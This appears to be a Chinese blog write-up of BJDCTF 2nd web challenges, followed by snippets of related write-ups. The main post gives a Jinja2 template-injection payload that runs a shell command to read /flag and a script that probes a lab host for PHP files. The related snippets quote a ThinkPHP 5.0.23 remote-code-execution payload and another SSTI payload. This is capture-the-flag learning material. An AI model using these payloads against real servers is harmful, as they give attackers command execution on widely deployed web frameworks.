BJDCTF 2nd WEB wp

最新推荐文章于 2020-11-12 14:42:37 发布
最新推荐文章于 2020-11-12 14:42:37 发布
阅读量279 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hao2580/article/details/105201225
版权

[BJDCTF 2nd]fake google

emmm,知识点:SSTI模板注入
分享一篇文章
我垃圾直接用师傅的playload:

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("cat /flag").read()') }}
  {% endif %}{% endif %}{% endfor %}{% endif %}{% endfor %}

在这里插入图片描述

[BJDCTF 2nd]elementmaster

在这里插入图片描述
看了之后挺有意思的。
查源代码,
在这里插入图片描述
id挺怪的,十六进制解得 Po. php,访问一下
在这里插入图片描述
脑洞挺大,看了别人的wp,嗯,元素周期表…
声明一下别人的脚本

import requests
import time

list = ['H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar','K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br', 'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Te', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te', 'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm', 'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn', 'Fr', 'Ra', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf', 'Es', 'Fm','Md', 'No', 'Lr', 'Rf', 'Db', 'Sg', 'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc', 'Lv', 'Ts', 'Og', 'Uue']
url = "http://4feb057d-dd21-4ed6-ace9-bba56434aebd.node3.buuoj.cn/"
t =" "
for i in list:
    time.sleep(0.06)
    i+=".php"
    print(i)
    url= url+i
    print(url)
    print('\n')
    r = requests.get(url)
    if r.status_code == 200:
        t += r.text
        print(t)
    url = "http://4feb057d-dd21-4ed6-ace9-bba56434aebd.node3.buuoj.cn/"

print(t)

print(url+t)

在这里插入图片描述
然后访问得flag
在这里插入图片描述

[BJDCTF 2nd]old-hack

提示ThinkPHP5
访问
在这里插入图片描述
查看tp版本
在这里插入图片描述
查tp这个版本的漏洞
在这里插入图片描述
得flag

后面的继续吧。。。。。。。

渣渣的沫沫
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BJDCTF 2nd pwn Writeup
starssgo的博客
03-23 3119
博客地址 没做完…没出的题复现了补上去… r2t3 整数溢出,还是比较简单的 # -*- coding: utf-8 -* from pwn import * from LibcSearcher import * context.log_level = 'debug' context.arch = 'amd64' elf = ELF('r2t3') p = 0 def pwn(ip,port,de...
[BJDCTF 2nd] web题-old-hack
BROTHERYY的博客
07-13 327
复现环境:buuoj.cn 发现是thinkphp5,让页面报错找到了具体的版本号。 上网找了这个漏洞的payload POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / 使用hackbar的post传递这个参数进去,查看根目录下的文件 读取flag flag{dc909607-e27c-40a9-86e8-2de6079ed503} ...
BJDCTF 2nd-WP
luoluopeach
03-23 714
Crypto 1.签到-y1ng 直接base64解码 QkpEe1czbGMwbWVfVDBfQkpEQ1RGfQ== flag:BJD{W3lc0me_T0_BJDCTF} 2.老文盲了 将文字转化为拼音可以知道文字就是flag flag:BJD{罼雧締眔擴灝淛匶襫黼瀬鎶軄鶛驕鳓哵眔鞹鰝} 3.cat_flag ...
BJD CTF 2nd web wp
0xdawn的博客
03-25 976
fake google 正好是前段时间学过的flask ssti,先给出payload name={{"".__class__.__mro__[1].__subclasses__()[81].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("cd ../;cat flag").read()')}} 老样子,...
【学习笔记14】buu [BJDCTF 2nd]old-hack
weixin_43553654的博客
05-14 319
首先打开网站一看,映入眼球,thinkphp,但是不知道是什么版本的所以就想办法构造一个报错来让它显示一些更详细的信息http://59429912-fc6a-4d2d-945a-c1aabf47f19f.node3.buuoj.cn/?s=3 这样就可以看到thinkphp的版本了是5.0.23版本接下来就简单了求助度娘,查找thinkphp5.0.23对应版本的漏洞最后在...
[BJDCTF 2nd]old-hack 1
feng的博客
11-12 981
WP 一道直接利用thinkphp的RCE洞的题目。 首先进入环境,得知这是一个thinkphp5,通过输入?s=1来报错,获得版本信息(是一个小姿势): tp5.0.23这个版本以及相近的版本以RCE而出名的,去网上搜一波payload,搜到了: ?s=1 _method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / 直接打就可以执行。 不过我一开始执行的时候,光看到了 system(): Cannot execu
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]...
BJDCTF 2nd–TARGZ
12-21
审题,tar没用,不需要爆破 下载附件得到tar.gz压缩包 查看16进制的时候发现是PK的头,对应的题目的提示tar不好使(就是不tar压缩的) ...发现可以解压但是得到的还是压缩包,继续重复操作… 当时我解了半小时(时间沉dedao...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
Flask Web Development 2nd edition
09-25
Flask web development, second edition, python web development
BJDCTF2nd webWP
热门推荐
BLlll的博客
03-23 1万+
BJDCTF2nd webWPfake googleold-hackduangShell假猪套天下第一简单注入xss之光Schrödingerelementmaster文件探测EasyAspDotNet fake google 考点:SSTI模板注入 验证漏洞 {{2*2}} 返回内容4,可确定是ssti,直接读取根目录下的flag pyload: {% for c in [].__clas...
BJDCTF 2nd菜鸡做题记录
bmth666的博客
03-25 3118
文章目录 萌新赛 做了一下web,感觉还没有入门,太难了吧,然后看大佬博客把能写的复现一下 [BJDCTF 2nd]简单注入 这道题没写出来,想了好久才想到可以用\转义掉',然后就开始盲注,发现禁用了select,尝试绕过未果,卡死,看师傅文章才发现可以正则匹配出password,妙呀,先写一下我的思路 username=\ password=...
[BJDCTF 2nd] old-hack
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-22 713
漏洞:ThinkPHP 5.0.23 RCE 参考https://www.codercto.com/a/54587.html http://ip_addr/index.php?s=captcha payload _method=__construct&filter[]=system&method=get&get[]=whoami
[BJDCTF 2nd]old-hack -wp
freerats的博客
07-04 365
进入网站,看到提示,powered By THINKPHP5 知道肯定与thinkphp5有关 传入一个s=1报错查看一下信息(这里要遇见过才知道,没什么技巧) 版本为50.0.23 post提交 _method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / 触发命令执行漏洞 cat /flag ...
BJD 2nd ctf大赛萌新wp
Theseus_sky的博客
03-22 2059
BJD 2nd ctf大赛萌新wp 太打击人了,果然就是个萌新!! crypto 签到题 “ QkpEe1czbGMwbWVfVDBfQkpEQ1RGfQ== ” 显然base64解码 老文盲了 “罼雧締眔擴灝淛匶襫黼瀬鎶軄鶛驕鳓哵眔鞹鰝” 萌新初体验,这道题丧心病狂,把前面几个生僻字拼音找了出来,发现刚好首字母是BJD,后三个发现是大括号的谐音,结尾三个也是如此,可得 BJD{淛匶襫黼瀬鎶軄鶛驕...
buuoj BJDCTF-2nd WP
会下雪的晴天
06-11 565
复现地址:buuoj.cn [BJDCTF 2nd]fake google ssti的简单使用 打开复现地址是一个Google页面 随便搜索一下看了源码提示ssti SSTI又叫服务端模板注入攻击 推荐先知师傅的一篇入门教程:https://xz.aliyun.com/t/3679 那就试试ssti能不能用吧,?name={{1-1}}下面输出却是0,说明注入是可以的 列出基类,?name={{"".__class__.__base__}} 列出其子类,?name={{"".__clas.
[BJDCTF 2nd] WEB 简单题汇总
SopRomeo的博客
03-26 3080
Web简单题复现[BJDCTF 2nd]fake google在这里插入图片描述 经过测试,存在xss和模板注入,这题是模板注入 [参考文献](https://xz.aliyun.com/t/3679)[BJDCTF 2nd]old-hack[BJDCTF 2nd]duangShell[BJDCTF 2nd]简单注入方法一:方法二:方法三:[BJDCTF 2nd]Schrödinger[BJDC...
[BJDCTF 2nd]old-hack
夜幕下的灯火阑珊的博客
05-13 922
知识点 thinkphp 5.0.23 RCE漏洞 题目 题目提示thinkphp5 构造index.php?s=1报错看看 看到版本号为5.0.23,搜索一波5.0.23漏洞 ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析 直接用payload打就是了
使用jQuery轻松开发Web应用
"Wrox.Web.Development.with.jQuery.2nd.Edition.2014" 是一本关于使用jQuery进行Web开发的书籍,主要讲解了jQuery库的API、jQuery UI以及一些流行的第三方jQuery插件。 jQuery是一个广泛应用于Web开发中的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值